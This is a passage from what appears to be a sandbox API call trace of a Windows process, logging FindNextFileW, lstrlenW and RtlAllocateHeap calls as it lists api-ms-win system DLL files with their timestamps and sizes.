dwReserved1=0x0, cFileName="api-ms-win-core-handle-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.360] lstrlenW (lpString="api-ms-win-core-handle-l1-1-0.dll") returned 33 [0060.360] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x70ed60 [0060.360] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.360] lstrlenW (lpString="api-ms-win-core-heap-l1-1-0.dll") returned 31 [0060.360] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x70ee30 [0060.360] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d078a1c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d078a1c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-interlocked-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.360] lstrlenW (lpString="api-ms-win-core-interlocked-l1-1-0.dll") returned 38 [0060.360] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xce) returned 0x70eef8 [0060.361] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-io-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.361] lstrlenW (lpString="api-ms-win-core-io-l1-1-0.dll") returned 29 [0060.361] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xbc) returned 0x70efd0 [0060.361] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-libraryloader-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.361] lstrlenW (lpString="api-ms-win-core-libraryloader-l1-1-0.dll") returned 40 [0060.361] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd2) returned 0x70f098 [0060.361] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.361] lstrlenW (lpString="api-ms-win-core-localization-l1-1-0.dll") returned 39 [0060.361] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd0) returned 0x70f178 [0060.361] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="")) returned 1 [0060.361] lstrlenW (lpString="api-ms-win-core-localization-l1-2-0.dll") returned 39 [0060.362] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd0) returned 0x70f250 [0060.362] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localregistry-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.362] lstrlenW (lpString="api-ms-win-core-localregistry-l1-1-0.dll") returned 40 [0060.362] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd2) returned 0x70f328 [0060.362] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0eae39, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0eae39, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-memory-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.362] lstrlenW (lpString="api-ms-win-core-memory-l1-1-0.dll") returned 33 [0060.362] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x70f408 [0060.362] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-misc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.362] lstrlenW (lpString="api-ms-win-core-misc-l1-1-0.dll") returned 31 [0060.362] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x70f4d8 [0060.362] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-namedpipe-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.362] lstrlenW (lpString="api-ms-win-core-namedpipe-l1-1-0.dll") returned 36 [0060.363] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xca) returned 0x70f5a0 [0060.363] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processenvironment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.363] lstrlenW (lpString="api-ms-win-core-processenvironment-l1-1-0.dll") returned 45 [0060.363] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xdc) returned 0x70f678 [0060.363] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.363] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-0.dll") returned 41 [0060.363] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd4) returned 0x70f760 [0060.363] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="")) returned 1 [0060.363] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-1.dll") returned 41 [0060.363] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd4) returned 0x70ffe8 [0060.364] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-profile-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.367] lstrlenW (lpString="api-ms-win-core-profile-l1-1-0.dll") returned 34 [0060.367] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc6) returned 0x7100c8 [0060.367] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-rtlsupport-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.367] lstrlenW (lpString="api-ms-win-core-rtlsupport-l1-1-0.dll") returned 37 [0060.367] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xcc) returned 0x710198 [0060.367] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1cf673, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1cf673, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.368] lstrlenW (lpString="api-ms-win-core-string-l1-1-0.dll") returned 33 [0060.368] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x710270 [0060.368] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d241a90, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d241a90, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.368] lstrlenW (lpString="api-ms-win-core-synch-l1-1-0.dll") returned 32 [0060.368] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2) returned 0x710340 [0060.368] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="")) returned 1 [0060.368] lstrlenW (lpString="api-ms-win-core-synch-l1-2-0.dll") returned 32 [0060.368] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2) returned 0x710410 [0060.368] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-sysinfo-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.368] lstrlenW (lpString="api-ms-win-core-sysinfo-l1-1-0.dll") returned 34 [0060.368] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc6) returned 0x7104e0 [0060.368] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d265d70, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-threadpool-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.369] lstrlenW (lpString="api-ms-win-core-threadpool-l1-1-0.dll") returned 37 [0060.369] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xcc) returned 0x7105b0 [0060.369] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.369] lstrlenW (lpString="api-ms-win-core-timezone-l1-1-0.dll") returned 35 [0060.369] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc8) returned 0x710688 [0060.369] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d21b931, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d21b931, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d21a280, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-util-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.369] lstrlenW (lpString="api-ms-win-core-util-l1-1-0.dll") returned 31 [0060.369] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x710758 [0060.369] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d9fe1dc, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d9fe1dc, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d9fd330, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.369] lstrlenW (lpString="api-ms-win-core-xstate-l1-1-0.dll") returned 33 [0060.369] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x710820 [0060.369] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="")) returned 1 [0060.369] lstrlenW (lpString="api-ms-win-core-xstate-l2-1-0.dll") returned 33 [0060.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x7108f0 [0060.370] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.370] lstrlenW (lpString="api-ms-win-crt-conio-l1-1-0.dll") returned 31 [0060.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x7109c0 [0060.370] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.370] lstrlenW (lpString="api-ms-win-crt-convert-l1-1-0.dll") returned 33 [0060.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x710a88 [0060.370] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.370] lstrlenW (lpString="api-ms-win-crt-environment-l1-1-0.dll") returned 37 [0060.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xcc) returned 0x710b70 [0060.371] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.371] lstrlenW (lpString="api-ms-win-crt-filesystem-l1-1-0.dll") returned 36 [0060.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xca) returned 0x710c48 [0060.371] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.371] lstrlenW (lpString="api-ms-win-crt-heap-l1-1-0.dll") returned 30 [0060.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xbe) returned 0x712b58 [0060.371] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.371] lstrlenW (lpString="api-ms-win-crt-locale-l1-1-0.dll") returned 32 [0060.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2) returned 0x712c38 [0060.372] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb846ba90, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb846ba90, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x5760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.372] lstrlenW (lpString="api-ms-win-crt-math-l1-1-0.dll") returned 30 [0060.372] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xbe) returned 0x714c20 [0060.372] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8445930, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8445930, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.372] lstrlenW (lpString="api-ms-win-crt-multibyte-l1-1-0.dll") returned 35 [0060.372] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc8) returned 0x712d08 [0060.372] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8125c50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8125c50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x10360, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.372] lstrlenW (lpString="api-ms-win-crt-private-l1-1-0.dll") returned 33 [0060.372] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x712dd8 [0060.372] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.372] lstrlenW (lpString="api-ms-win-crt-process-l1-1-0.dll") returned 33 [0060.372] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x712ea8 [0060.373] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, 